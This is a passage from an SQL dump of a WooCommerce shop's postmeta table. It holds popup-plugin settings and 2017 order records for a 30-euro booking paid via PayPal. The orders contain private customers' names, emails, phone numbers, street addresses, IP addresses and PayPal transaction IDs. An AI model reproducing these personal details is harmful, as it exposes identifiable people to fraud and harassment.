attached','[]'),(2347,291,'Payer PayPal address','marcogasperoni18@gmail.com'),(2348,291,'Payer first name','marco'),(2349,291,'Payer last name','gasperoni'),(2350,291,'Payment type','instant'),(2351,291,'_download_permissions_granted','1'),(2352,291,'_recorded_sales','yes'),(2353,291,'_paid_date','2017-02-03 18:15:19'),(2354,291,'_transaction_id','8RK762544D5205051'),(2355,291,'_order_stock_reduced','1'),(2356,291,'PayPal Transaction Fee','1.37'),(2357,290,'_wc_review_count','0'),(2358,292,'_edit_lock','1486478894:1'),(2359,292,'_edit_last','1'),(2360,292,'slide_template','default'),(2361,292,'pps_slider_start_at','1'),(2362,292,'pps_rg_img','a:0:{}'),(2363,292,'pps_autoplay_embed','false'),(2364,292,'pps_embed_height','460'),(2365,292,'pps_rg_oEmbed','a:0:{}'),(2366,292,'pps_iframe_height','460'),(2367,292,'pps_pdf_height','460'),(2368,292,'pps_pdf_download_link','false'),(2369,292,'pps_disclaimer_activate','false'),(2370,292,'pps_disclaimer_agree_button_text','I Agree'),(2371,292,'pps_disclaimer_agree_button_css','pps-disclaimer-agree'),(2372,292,'pps_disclaimer_agree_redirect','same_page'),(2373,292,'pps_disclaimer_agree_redirect_to','http://'),(2374,292,'pps_disclaimer_agree_target','_self'),(2375,292,'pps_disclaimer_disagree_button_text','I Disagree'),(2376,292,'pps_disclaimer_disagree_button_css','pps-disclaimer-disagree'),(2377,292,'pps_disclaimer_disagree_restriction','close_page'),(2378,292,'pps_disclaimer_disagree_redirect_to','http://'),(2379,292,'pps_disclaimer_disagree_target','_self'),(2380,292,'pps_custom_css_popup','/* Customize the button of the popup */\r\na.pps-btn.pps-button-popup {\r\n color: #FFF;\r\n font-size: 12px;\r\n line-height: 1.6;\r\n font-weight: bold;\r\n padding:5px 14px 4px;\r\n font-family: Arial, Helvetica, sans-serif;\r\n background-color: #348ECC;\r\n border-bottom: 2px solid #1B80C5;\r\n border-radius: 3px;\r\n}\r\na.pps-btn.pps-button-popup:hover {\r\n background-color: #3C9CDD;\r\n border-color: #1B80C5;\r\n}\r\n/* Add additional styles */\r\n'),(2381,292,'pps_slider_auto','false'),(2382,292,'pps_slider_animation_speed','600'),(2383,292,'pps_slider_timeout','6000'),(2384,292,'pps_slider_pagination','true'),(2385,292,'pps_slider_arrows','true'),(2386,292,'pps_slider_pause','true'),(2387,292,'pps_mbox_editor_order','1'),(2388,292,'pps_mbox_file_order','2'),(2389,292,'pps_mbox_oembed_order','3'),(2390,292,'pps_mbox_iframe_order','4'),(2391,292,'pps_mbox_pdf_order','5'),(2392,292,'pps_button_type','no-button'),(2393,292,'pps_img_width_button','160'),(2394,292,'pps_button_text','Open Popup'),(2395,292,'pps_button_title','Click here to open Popup'),(2396,292,'pps_button_class','pps-button-popup'),(2397,292,'pps_class_thumbnail','pps-thumb-slider'),(2398,292,'pps_n_columns','auto'),(2399,292,'pps_open_hook','auto_open'),(2400,292,'pps_leave_page_max_times','1'),(2401,292,'pps_first_time','true'),(2402,292,'pps_cookie_expire','current_session'),(2403,292,'pps_cookie_days','1'),(2404,292,'pps_not_show_again','false'),(2405,292,'pps_open_in','all-site'),(2406,292,'pps_exclude_pages','283,290'),(2407,292,'pps_popup_transition','fadeIn'),(2408,292,'pps_speed','300'),(2409,292,'pps_popup_easing','swing'),(2410,292,'pps_disable_logged_user','false'),(2411,292,'pps_disable_mobile','false'),(2412,292,'pps_disable_desktop','false'),(2413,292,'pps_auto_close','false'),(2414,292,'pps_delay_close','10000'),(2415,292,'pps_close_overlay','true'),(2416,292,'pps_close_esc_key','true'),(2417,292,'pps_close_mouselave','false'),(2418,292,'pps_bg_content','#FFFFFF'),(2419,292,'pps_width','310'),(2420,292,'pps_width_units','px'),(2421,292,'pps_auto_height','true'),(2422,292,'pps_height_units','px'),(2423,292,'pps_pad_top','15'),(2424,292,'pps_pad_right','20'),(2425,292,'pps_pad_bottom','15'),(2426,292,'pps_pad_left','20'),(2427,292,'pps_spacing_content','00'),(2428,292,'pps_border_popup','00'),(2429,292,'pps_border_color','#000000'),(2430,292,'pps_border_opacity','0.4'),(2431,292,'pps_border_radius','5'),(2432,292,'pps_size_text_content','16'),(2433,292,'pps_show_title','true'),(2434,292,'pps_color_text_title','#444444'),(2435,292,'pps_bg_title','#FFFFFF'),(2436,292,'pps_size_text_title','20'),(2437,292,'pps_align_title','left'),(2438,292,'pps_color_border_title','#EEEEEE'),(2439,292,'pps_pad_top_title','00'),(2440,292,'pps_pad_right_title','00'),(2441,292,'pps_pad_bottom_title','10'),(2442,292,'pps_pad_left_title','00'),(2443,292,'pps_bg_overlay','#000000'),(2444,292,'pps_opacity','0.75'),(2445,292,'pps_position_type','absolute'),(2446,292,'pps_position_x','auto'),(2447,292,'pps_position_y','auto'),(2448,292,'pps_follow_x','true'),(2449,292,'pps_follow_y','true'),(2450,292,'pps_show_close','true'),(2451,292,'pps_icon_close_btn','pps-icon-close'),(2452,292,'pps_size_close_btn','18'),(2453,292,'pps_color_close_btn','#999999'),(2454,292,'pps_color_close_btn_hover','#222222'),(2455,292,'pps_bg_close_btn','#FFFFFF'),(2456,292,'pps_close_btn_border_radius','18'),(2457,292,'pps_ref_pos_close_btn','popup'),(2458,292,'pps_margin_top_close_btn','-14'),(2459,292,'pps_margin_right_close_btn','-14'),(2460,292,'pps_show_wrap_close_btn','true'),(2461,292,'_yoast_wpseo_content_score','30'),(2462,292,'pps-views','588'),(2464,283,'_thumbnail_id','285'),(2467,225,'_thumbnail_id','236'),(2470,295,'_order_key','wc_order_589bc3ff5435a'),(2471,295,'_order_currency','EUR'),(2472,295,'_prices_include_tax','no'),(2473,295,'_customer_ip_address','151.67.251.116'),(2474,295,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2475,295,'_customer_user','0'),(2476,295,'_created_via','checkout'),(2477,295,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2478,295,'_order_version','2.6.14'),(2479,295,'_billing_first_name','Nicola'),(2480,295,'_billing_last_name','Dellarosa'),(2481,295,'_billing_email','dellarn82@gmail.com'),(2482,295,'_billing_phone','3391564530'),(2483,295,'_billing_address_1','Slataper 3'),(2484,295,'_billing_city','Rimini'),(2485,295,'_shipping_first_name','Nicola'),(2486,295,'_shipping_last_name','Dellarosa'),(2487,295,'_shipping_company',''),(2488,295,'_shipping_country',''),(2489,295,'_shipping_address_1','Slataper 3'),(2490,295,'_shipping_address_2',''),(2491,295,'_shipping_city','Rimini'),(2492,295,'_shipping_state',''),(2493,295,'_shipping_postcode',''),(2494,295,'_payment_method','paypal'),(2495,295,'_payment_method_title','PayPal'),(2496,295,'_order_shipping',''),(2497,295,'_cart_discount','0'),(2498,295,'_cart_discount_tax','0'),(2499,295,'_order_tax','0'),(2500,295,'_order_shipping_tax','0'),(2501,295,'_order_total','30.00'),(2502,295,'Numero Persone Adulte','2'),(2503,295,'Numero bambini fino a 6 anni',''),(2504,295,'Numero ragazzi fino a 13 anni',''),(2505,295,'Files attached','[]'),(2506,296,'_order_key','wc_order_589c76862e897'),(2507,296,'_order_currency','EUR'),(2508,296,'_prices_include_tax','no'),(2509,296,'_customer_ip_address','5.168.108.251'),(2510,296,'_customer_user_agent','Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(2511,296,'_customer_user','0'),(2512,296,'_created_via','checkout'),(2513,296,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2514,296,'_order_version','2.6.14'),(2515,296,'_billing_first_name','Francesco'),(2516,296,'_billing_last_name','Baldisserri'),(2517,296,'_billing_company',''),(2518,296,'_billing_email','magnaromagna@gmail.com'),(2519,296,'_billing_phone','3286193589'),(2520,296,'_billing_country','IT'),(2521,296,'_billing_address_1','via di vittorio 29'),(2522,296,'_billing_address_2',''),(2523,296,'_billing_city','Solarolo'),(2524,296,'_billing_state','RA'),(2525,296,'_billing_postcode','48027'),(2526,296,'_shipping_first_name','Francesco'),(2527,296,'_shipping_last_name','Baldisserri'),(2528,296,'_shipping_company',''),(2529,296,'_shipping_country','IT'),(2530,296,'_shipping_address_1','via di vittorio 29'),(2531,296,'_shipping_address_2',''),(2532,296,'_shipping_city','Solarolo'),(2533,296,'_shipping_state','RA'),(2534,296,'_shipping_postcode','48027'),(2535,296,'_payment_method','paypal'),(2536,296,'_payment_method_title','PayPal'),(2537,296,'_order_shipping',''),(2538,296,'_cart_discount','0'),(2539,296,'_cart_discount_tax','0'),(2540,296,'_order_tax','0'),(2541,296,'_order_shipping_tax','0'),(2542,296,'_order_total','30.00'),(2543,297,'_order_key','wc_order_589c7b7e08644'),(2544,297,'_order_currency','EUR'),(2545,297,'_prices_include_tax','no'),(2546,297,'_customer_ip_address','87.11.245.219'),(2547,297,'_customer_user_agent','Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(2548,297,'_customer_user','0'),(2549,297,'_created_via','checkout'),(2550,297,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2551,297,'_order_version','2.6.14'),(2552,297,'_billing_first_name','Stefano'),(2553,297,'_billing_last_name','Bullini'),(2554,297,'_billing_company',''),(2555,297,'_billing_email','s.bullini@alice.it'),(2556,297,'_billing_phone','3382699305'),(2557,297,'_billing_country','IT'),(2558,297,'_billing_address_1','Via 1 maggio 17'),(2559,297,'_billing_address_2',''),(2560,297,'_billing_city','Montegrimano terme'),(2561,297,'_billing_state','PU'),(2562,297,'_billing_postcode','61010'),(2563,297,'_shipping_first_name','Stefano'),(2564,297,'_shipping_last_name','Bullini'),(2565,297,'_shipping_company',''),(2566,297,'_shipping_country','IT'),(2567,297,'_shipping_address_1','Via 1 maggio 17'),(2568,297,'_shipping_address_2',''),(2569,297,'_shipping_city','Montegrimano terme'),(2570,297,'_shipping_state','PU'),(2571,297,'_shipping_postcode','61010'),(2572,297,'_payment_method','paypal'),(2573,297,'_payment_method_title','PayPal'),(2574,297,'_order_shipping',''),(2575,297,'_cart_discount','0'),(2576,297,'_cart_discount_tax','0'),(2577,297,'_order_tax','0'),(2578,297,'_order_shipping_tax','0'),(2579,297,'_order_total','30.00'),(2580,297,'Payer PayPal address','s.bullini@libero.it'),(2581,297,'Payer first name','Pamela'),(2582,297,'Payer last name','Biagetti'),(2583,297,'Payment type','instant'),(2584,297,'_download_permissions_granted','1'),(2585,297,'_recorded_sales','yes'),(2586,297,'_paid_date','2017-02-09 15:26:43'),(2587,297,'_transaction_id','49K61837HG887621Y'),(2588,297,'_order_stock_reduced','1'),(2589,297,'PayPal Transaction Fee','1.37'),(2590,298,'_order_key','wc_order_589c9fe4b9dbf'),(2591,298,'_order_currency','EUR'),(2592,298,'_prices_include_tax','no'),(2593,298,'_customer_ip_address','151.67.251.116'),(2594,298,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2595,298,'_customer_user','0'),(2596,298,'_created_via','checkout'),(2597,298,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2598,298,'_order_version','2.6.14'),(2599,298,'_billing_first_name','Nicola'),(2600,298,'_billing_last_name','Dellarosa'),(2601,298,'_billing_company',''),(2602,298,'_billing_email','dellarn82@gmail.com'),(2603,298,'_billing_phone','3391564530'),(2604,298,'_billing_country','IT'),(2605,298,'_billing_address_1','Slataper 3'),(2606,298,'_billing_address_2',''),(2607,298,'_billing_city','Rimini'),(2608,298,'_billing_state','RN'),(2609,298,'_billing_postcode','47921'),(2610,298,'_shipping_first_name','Nicola'),(2611,298,'_shipping_last_name','Dellarosa'),(2612,298,'_shipping_company',''),(2613,298,'_shipping_country','IT'),(2614,298,'_shipping_address_1','Slataper 3'),(2615,298,'_shipping_address_2',''),(2616,298,'_shipping_city','Rimini'),(2617,298,'_shipping_state','RN'),(2618,298,'_shipping_postcode','47921'),(2619,298,'_payment_method','paypal'),(2620,298,'_payment_method_title','PayPal'),(2621,298,'_order_shipping',''),(2622,298,'_cart_discount','0'),(2623,298,'_cart_discount_tax','0'),(2624,298,'_order_tax','0'),(2625,298,'_order_shipping_tax','0'),(2626,298,'_order_total','30.00'),(2627,298,'Payer PayPal address','dellarn82@gmail.com'),(2628,298,'Payer first name','Nicola'),(2629,298,'Payer last name','Dellarosa'),(2630,298,'Payment type','instant'),(2631,298,'_download_permissions_granted','1'),(2632,298,'_recorded_sales','yes'),(2633,298,'_paid_date','2017-02-09 18:00:41'),(2634,298,'_transaction_id','1JA64476TF8295513'),(2635,298,'_order_stock_reduced','1'),(2636,298,'PayPal Transaction Fee','1.37'),(2637,299,'_order_key','wc_order_589cb276f1914'),(2638,299,'_order_currency','EUR'),(2639,299,'_prices_include_tax','no'),(2640,299,'_customer_ip_address','5.169.100.24'),(2641,299,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),(2642,299,'_customer_user','0'),(2643,299,'_created_via','checkout'),(2644,299,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2645,299,'_order_version','2.6.14'),(2646,299,'_billing_first_name','Riccardo'),(2647,299,'_billing_last_name','Magli'),(2648,299,'_billing_company',''),(2649,299,'_billing_email','magliriccardo@gmail.com'),(2650,299,'_billing_phone','3396089941'),(2651,299,'_billing_country','IT'),(2652,299,'_billing_address_1','Via siepelunga 73'),(2653,299,'_billing_address_2',''),(2654,299,'_billing_city','Bologna'),(2655,299,'_billing_state','BO'),(2656,299,'_billing_postcode','40141'),(2657,299,'_shipping_first_name','Riccardo'),(2658,299,'_shipping_last_name','Magli'),(2659,299,'_shipping_company',''),(2660,299,'_shipping_country','IT'),(2661,299,'_shipping_address_1','Via siepelunga 73'),(2662,299,'_shipping_address_2',''),(2663,299,'_shipping_city','Bologna'),(2664,299,'_shipping_state','BO'),(2665,299,'_shipping_postcode','40141'),(2666,299,'_payment_method','paypal'),(2667,299,'_payment_method_title','PayPal'),(2668,299,'_order_shipping',''),(2669,299,'_cart_discount','0'),(2670,299,'_cart_discount_tax','0'),(2671,299,'_order_tax','0'),(2672,299,'_order_shipping_tax','0'),(2673,299,'_order_total','30.00'),(2674,299,'Payer PayPal address','riccardomagli5@gmail.com'),(2675,299,'Payer first name','Riccardo'),(2676,299,'Payer last name','Magli'),(2677,299,'Payment type','instant'),(2678,299,'_download_permissions_granted','1'),(2679,299,'_recorded_sales','yes'),(2680,299,'_paid_date','2017-02-09 19:19:12'),(2681,299,'_transaction_id','0PG82676AF6303307'),(2682,299,'_order_stock_reduced','1'),(2683,299,'PayPal Transaction Fee','1.37'),(2688,302,'_order_key','wc_order_589cb824102e1'),(2689,302,'_order_currency','EUR'),(2690,302,'_prices_include_tax','no'),(2691,302,'_customer_ip_address','80.180.19.233'),(2692,302,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'),(2693,302,'_customer_user','0'),(2694,302,'_created_via','checkout'),(2695,302,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2696,302,'_order_version','2.6.14'),(2697,302,'_billing_first_name','franco'),(2698,302,'_billing_last_name','baldisserri'),(2699,302,'_billing_email','magnaromagna@gmail.com'),(2700,302,'_billing_phone','3286193589'),(2701,302,'_billing_address_1','via di vittorio 31'),(2702,302,'_billing_city','faenza'),(2703,302,'_shipping_first_name','franco'),(2704,302,'_shipping_last_name','baldisserri'),(2705,302,'_shipping_company',''),(2706,302,'_shipping_country',''),(2707,302,'_shipping_address_1','via di vittorio 31'),(2708,302,'_shipping_address_2',''),(2709,302,'_shipping_city','faenza'),(2710,302,'_shipping_state',''),(2711,302,'_shipping_postcode',''),(2712,302,'_payment_method','paypal'),(2713,302,'_payment_method_title','PayPal'),(2714,302,'_order_shipping',''),(2715,302,'_cart_discount','0'),(2716,302,'_cart_discount_tax','0'),(2717,302,'_order_tax','0'),(2718,302,'_order_shipping_tax','0'),(2719,302,'_order_total','30.00'),(2720,302,'Numero Persone Adulte','2'),(2721,302,'Numero bambini fino a 6 anni',''),(2722,302,'Numero ragazzi fino a 13 anni',''),(2723,302,'Files attached','[]'),(2726,304,'_order_key','wc_order_589dc16f037d6'),(2727,304,'_order_currency','EUR'),(2728,304,'_prices_include_tax','no'),(2729,304,'_customer_ip_address','89.202.223.34'),(2730,304,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2731,304,'_customer_user','0'),(2732,304,'_created_via','checkout'),(2733,304,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2734,304,'_order_version','2.6.14'),(2735,304,'_billing_first_name','michele'),(2736,304,'_billing_last_name','tortorella'),(2737,304,'_billing_email','mici3r@alice.it'),(2738,304,'_billing_phone','3475010044'),(2739,304,'_billing_address_1','via ex tiro a segno 357'),(2740,304,'_billing_city','cesena'),(2741,304,'_shipping_first_name','michele'),(2742,304,'_shipping_last_name','tortorella'),(2743,304,'_shipping_company',''),(2744,304,'_shipping_country',''),(2745,304,'_shipping_address_1','via ex tiro a segno 357'),(2746,304,'_shipping_address_2',''),(2747,304,'_shipping_city','cesena'),(2748,304,'_shipping_state',''),(2749,304,'_shipping_postcode',''),(2750,304,'_payment_method','paypal'),(2751,304,'_payment_method_title','PayPal'),(2752,304,'_order_shipping',''),(2753,304,'_cart_discount','0'),(2754,304,'_cart_discount_tax','0'),(2755,304,'_order_tax','0'),(2756,304,'_order_shipping_tax','0'),(2757,304,'_order_total','30.00'),(2758,304,'Numero Persone Adulte','2'),(2759,304,'Numero bambini fino a 6 anni',''),(2760,304,'Numero ragazzi fino a 13 anni',''),(2761,304,'Files attached','[]'),(2762,304,'Payer PayPal address','mici3r@alice.it'),(2763,304,'Payer first name','michele'),(2764,304,'Payer last name','tortorella'),(2765,304,'Payment type','instant'),(2766,304,'_download_permissions_granted','1'),(2767,304,'_recorded_sales','yes'),(2768,304,'_paid_date','2017-02-10 14:35:24'),(2769,304,'_transaction_id','27L89054BX318344U'),(2770,304,'_order_stock_reduced','1'),(2771,304,'PayPal Transaction Fee','1.37'),(2772,305,'_order_key','wc_order_589e2890956c7'),(2773,305,'_order_currency','EUR'),(2774,305,'_prices_include_tax','no'),(2775,305,'_customer_ip_address','2.35.177.209'),(2776,305,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1'),(2777,305,'_customer_user','0'),(2778,305,'_created_via','checkout'),(2779,305,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2780,305,'_order_version','2.6.14'),(2781,305,'_billing_first_name','Mattia'),(2782,305,'_billing_last_name','Cappelli'),(2783,305,'_billing_email','mattiacappelli3006@gmail.com'),(2784,305,'_billing_phone','3467779826'),(2785,305,'_billing_address_1','Via Germazzo 240'),(2786,305,'_billing_city','Cesena'),(2787,305,'_shipping_first_name','Mattia'),(2788,305,'_shipping_last_name','Cappelli'),(2789,305,'_shipping_company',''),(2790,305,'_shipping_country',''),(2791,305,'_shipping_address_1','Via Germazzo 240'),(2792,305,'_shipping_address_2',''),(2793,305,'_shipping_city','Cesena'),(2794,305,'_shipping_state',''),(2795,305,'_shipping_postcode',''),(2796,305,'_payment_method','paypal'),(2797,305,'_payment_method_title','PayPal'),(2798,305,'_order_shipping',''),(2799,305,'_cart_discount','0'),(2800,305,'_cart_discount_tax','0'),(2801,305,'_order_tax','0'),(2802,305,'_order_shipping_tax','0'),(2803,305,'_order_total','30.00'),(2804,305,'Numero Persone Adulte','2'),(2805,305,'Numero bambini fino a 6 anni',''),(2806,305,'Numero ragazzi fino a 13 anni',''),(2807,305,'Files attached','[]'),(2808,305,'Payer PayPal address','mattiacappelli3006@gmail.com'),(2809,305,'Payer first name','daniele'),(2810,305,'Payer last name','cappelli'),(2811,305,'Payment type','instant'),(2812,305,'_download_permissions_granted','1'),(2813,305,'_recorded_sales','yes'),(2814,305,'_paid_date','2017-02-10 21:57:58'),(2815,305,'_transaction_id','6VW71651KK1563259'),(2816,305,'_order_stock_reduced','1'),(2817,305,'PayPal Transaction Fee','1.37'),(2818,306,'_order_key','wc_order_589efdbdb7901'),(2819,306,'_order_currency','EUR'),(2820,306,'_prices_include_tax','no'),(2821,306,'_customer_ip_address','91.253.18.63'),(2822,306,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1'),(2823,306,'_customer_user','0'),(2824,306,'_created_via','checkout'),(2825,306,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2826,306,'_order_version','2.6.14'),(2827,306,'_billing_first_name','Omar'),(2828,306,'_billing_last_name','Riahi'),(2829,306,'_billing_email','riahi.omar89@gmail.com'),(2830,306,'_billing_phone','3468289196'),(2831,306,'_billing_address_1','Via Giacomo lercaro 4/5'),(2832,306,'_billing_city','Bentivoglio'),(2833,306,'_shipping_first_name','Omar'),(2834,306,'_shipping_last_name','Riahi'),(2835,306,'_shipping_company',''),(2836,306,'_shipping_country',''),(2837,306,'_shipping_address_1','Via Giacomo lercaro 4/5'),(2838,306,'_shipping_address_2',''),(2839,306,'_shipping_city','Bentivoglio'),(2840,306,'_shipping_state',''),(2841,306,'_shipping_postcode',''),(2842,306,'_payment_method','paypal'),(2843,306,'_payment_method_title','PayPal'),(2844,306,'_order_shipping',''),(2845,306,'_cart_discount','0'),(2846,306,'_cart_discount_tax','0'),(2847,306,'_order_tax','0'),(2848,306,'_order_shipping_tax','0'),(2849,306,'_order_total','30.00'),(2850,306,'Numero Persone Adulte','2'),(2851,306,'Numero bambini fino a 6 anni','0'),(2852,306,'Numero ragazzi fino a 13 anni','0'),(2853,306,'Files attached','[]'),(2854,306,'Payer PayPal address','riahi.omar89@gmail.com'),(2855,306,'Payer first name','Omar'),(2856,306,'Payer last name','Riahi'),(2857,306,'Payment type','instant'),(2858,306,'_download_permissions_granted','1'),(2859,306,'_recorded_sales','yes'),(2860,306,'_paid_date','2017-02-11 13:06:11'),(2861,306,'_transaction_id','0Y4958892P848511D'),(2862,306,'_order_stock_reduced','1'),(2863,306,'PayPal Transaction Fee','1.37'),(2864,307,'_order_key','wc_order_589f616c97d97'),(2865,307,'_order_currency','EUR'),(2866,307,'_prices_include_tax','no'),(2867,307,'_customer_ip_address','79.26.240.232'),(2868,307,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),(2869,307,'_customer_user','5'),(2870,307,'_created_via','checkout'),(2871,307,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2872,307,'_order_version','2.6.14'),(2873,307,'_billing_first_name','massimiliano'),(2874,307,'_billing_last_name','ricciardone'),(2875,307,'_billing_email','ricciardone@alice.it'),(2876,307,'_billing_phone','3336453072'),(2877,307,'_billing_address_1','Via annibolina 14'),(2878,307,'_billing_city','San clemente Rimini'),(2879,307,'_shipping_first_name','massimiliano'),(2880,307,'_shipping_last_name','ricciardone'),(2881,307,'_shipping_company',''),(2882,307,'_shipping_country',''),(2883,307,'_shipping_address_1','Via annibolina 14'),(2884,307,'_shipping_address_2',''),(2885,307,'_shipping_city','San clemente Rimini'),(2886,307,'_shipping_state',''),(2887,307,'_shipping_postcode',''),(2888,307,'_payment_method','paypal'),(2889,307,'_payment_method_title','PayPal'),(2890,307,'_order_shipping',''),(2891,307,'_cart_discount','0'),(2892,307,'_cart_discount_tax','0'),(2893,307,'_order_tax','0'),(2894,307,'_order_shipping_tax','0'),(2895,307,'_order_total','30.00'),(2896,307,'Numero Persone Adulte','2'),(2897,307,'Numero bambini fino a 6 anni',''),(2898,307,'Numero ragazzi fino a 13 anni',''),(2899,307,'Files attached','[]'),(2900,307,'Payer PayPal address','ricciardone@alice.it'),(2901,307,'Payer first name','massimiliano'),(2902,307,'Payer last name','ricciardone'),(2903,307,'Payment type','instant'),(2904,307,'_download_permissions_granted','1'),(2905,307,'_recorded_sales','yes'),(2906,307,'_paid_date','2017-02-11 20:10:20'),(2907,307,'_transaction_id','2CH27453T5082642V'),(2908,307,'_order_stock_reduced','1'),(2909,307,'PayPal Transaction Fee','1.37'),(2910,308,'_order_key','wc_order_58a034c3a0950'),(2911,308,'_order_currency','EUR'),(2912,308,'_prices_include_tax','no'),(2913,308,'_customer_ip_address','109.235.109.111'),(2914,308,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2915,308,'_customer_user','0'),(2916,308,'_created_via','checkout'),(2917,308,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2918,308,'_order_version','2.6.14'),(2919,308,'_billing_first_name','Floriana'),(2920,308,'_billing_last_name','Righi'),(2921,308,'_billing_email','florighi69@yahoo.it'),(2922,308,'_billing_phone','3453137292'),(2923,308,'_billing_address_1',''),(2924,308,'_billing_city','San Marino'),(2925,308,'_shipping_first_name','Floriana'),(2926,308,'_shipping_last_name','Righi'),(2927,308,'_shipping_company',''),(2928,308,'_shipping_country',''),(2929,308,'_shipping_address_1',''),(2930,308,'_shipping_address_2',''),(2931,308,'_shipping_city','San Marino'),(2932,308,'_shipping_state',''),(2933,308,'_shipping_postcode',''),(2934,308,'_payment_method','paypal'),(2935,308,'_payment_method_title','PayPal'),(2936,308,'_order_shipping',''),(2937,308,'_cart_discount','0'),(2938,308,'_cart_discount_tax','0'),(2939,308,'_order_tax','0'),(2940,308,'_order_shipping_tax','0'),(2941,308,'_order_total','30.00'),(2942,308,'Numero Persone Adulte','2'),(2943,308,'Numero bambini fino a 6 anni',''),(2944,308,'Numero ragazzi fino a 13 anni',''),(2945,308,'Files attached','[]'),(2946,309,'_order_key','wc_order_58a037c3077cf'),(2947,309,'_order_currency','EUR'),(2948,309,'_prices_include_tax','no'),(2949,309,'_customer_ip_address','109.235.109.111'),(2950,309,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2951,309,'_customer_user','0'),(2952,309,'_created_via','checkout'),(2953,309,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2954,309,'_order_version','2.6.14'),(2955,309,'_billing_first_name','floriana'),(2956,309,'_billing_last_name','righi'),(2957,309,'_billing_email','florighi69@yahoo.it'),(2958,309,'_billing_phone','3453137292'),(2959,309,'_billing_address_1','cantu 77'),(2960,309,'_billing_city','Dogana RSM'),(2961,309,'_shipping_first_name','floriana'),(2962,309,'_shipping_last_name','righi'),(2963,309,'_shipping_company',''),(2964,309,'_shipping_country',''),(2965,309,'_shipping_address_1','cantu 77'),(2966,309,'_shipping_address_2',''),(2967,309,'_shipping_city','Dogana RSM'),(2968,309,'_shipping_state',''),(2969,309,'_shipping_postcode',''),(2970,309,'_payment_method','paypal'),(2971,309,'_payment_method_title','PayPal'),(2972,309,'_order_shipping',''),(2973,309,'_cart_discount','0'),(2974,309,'_cart_discount_tax','0'),(2975,309,'_order_tax','0'),(2976,309,'_order_shipping_tax','0'),(2977,309,'_order_total','30.00'),(2978,309,'Numero Persone Adulte','2'),(2979,309,'Numero bambini fino a 6 anni',''),(2980,309,'Numero ragazzi fino a 13 anni',''),(2981,309,'Files attached','[]'),(2982,310,'_order_key','wc_order_58a06ddf2a040'),(2983,310,'_order_currency','EUR'),(2984,310,'_prices_include_tax','no'),(2985,310,'_customer_ip_address','194.183.92.97'),(2986,310,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2987,310,'_customer_user','0'),(2988,310,'_created_via','checkout'),(2989,310,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(2990,310,'_order_version','2.6.14'),(2991,310,'_billing_first_name','Andrea'),(2992,310,'_billing_last_name','Candini'),(2993,310,'_billing_email','formulauff@gmail.com'),(2994,310,'_billing_phone','3498535612'),(2995,310,'_billing_address_1','via r da castiglione 20'),(2996,310,'_billing_city','Domagnano'),(2997,310,'_shipping_first_name','Andrea'),(2998,310,'_shipping_last_name','Candini'),(2999,310,'_shipping_company',''),(3000,310,'_shipping_country',''),(3001,310,'_shipping_address_1','via r da castiglione 20'),(3002,310,'_shipping_address_2',''),(3003,310,'_shipping_city','Domagnano'),(3004,310,'_shipping_state',''),(3005,310,'_shipping_postcode',''),(3006,310,'_payment_method','paypal'),(3007,310,'_payment_method_title','PayPal'),(3008,310,'_order_shipping',''),(3009,310,'_cart_discount','0'),(3010,310,'_cart_discount_tax','0'),(3011,310,'_order_tax','0'),(3012,310,'_order_shipping_tax','0'),(3013,310,'_order_total','30.00'),(3014,310,'Numero Persone Adulte','2'),(3015,310,'Numero bambini fino a 6 anni',''),(3016,310,'Numero ragazzi fino a 13 anni',''),(3017,310,'Files attached','[]'),(3018,310,'Payer PayPal address','formulauff@gmail.com'),(3019,310,'Payer first name','Andrea'),(3020,310,'Payer last name','Candini'),(3021,310,'Payment type','instant'),(3022,310,'_download_permissions_granted','1'),(3023,310,'_recorded_sales','yes'),(3024,310,'_paid_date','2017-02-12 